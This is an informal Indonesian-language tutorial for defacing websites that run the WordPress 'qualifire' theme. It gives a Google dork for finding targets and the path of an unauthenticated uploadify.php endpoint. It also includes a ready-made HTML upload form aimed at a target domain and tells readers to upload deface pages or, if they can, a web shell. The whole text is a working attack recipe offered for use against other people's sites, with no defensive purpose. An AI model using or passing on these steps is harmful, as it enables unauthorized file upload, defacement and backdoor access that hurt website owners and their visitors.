Dork :
inurl:"/wp-content/themes/qualifire"
(Kembangkan Lagi Cok !)
Exploit :
/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
1. Masukan Dork Di Atas Ke GOOGLE (Search Enginer)
3. Tambahin Url Websites Menjadi
website.com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
Jika Vuln TampilanNya BLANK PUTIH Atau Muncul Angka Gajelas Kyk Muka Lu :v
4. Copy Script SCRF Di Bawah Ini , Simpan Dengan Ex.HTML (Contoh.html)
<form
action="http://www.target.co.li/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="Submit">
</form>
Ganti http://www.target.co.il/ Dengan Website Target Luh!
5. Buka FILES CSRF Yang Tadi Lu Simpen , Lalu Upload GAMBAR (.jpg , .jpeg , .gif) Atau Kalau Bisa Script Deface Kalian (.html , .htm)
" KALAU KALIAN BISA UPLOAD SHELL YA ALHAMDULILLAH :v "
Maka Akan Nampak Seperti Ini :
6. Dan Lihat HasilNya.... www.TARGET.co.il/NamaFile. (html/htm jpg/jpeg/gif)
Taraaa..... :V Sekian Dari Gua Yang Ganteng Apa Adanya Pamit Mau Pulang :3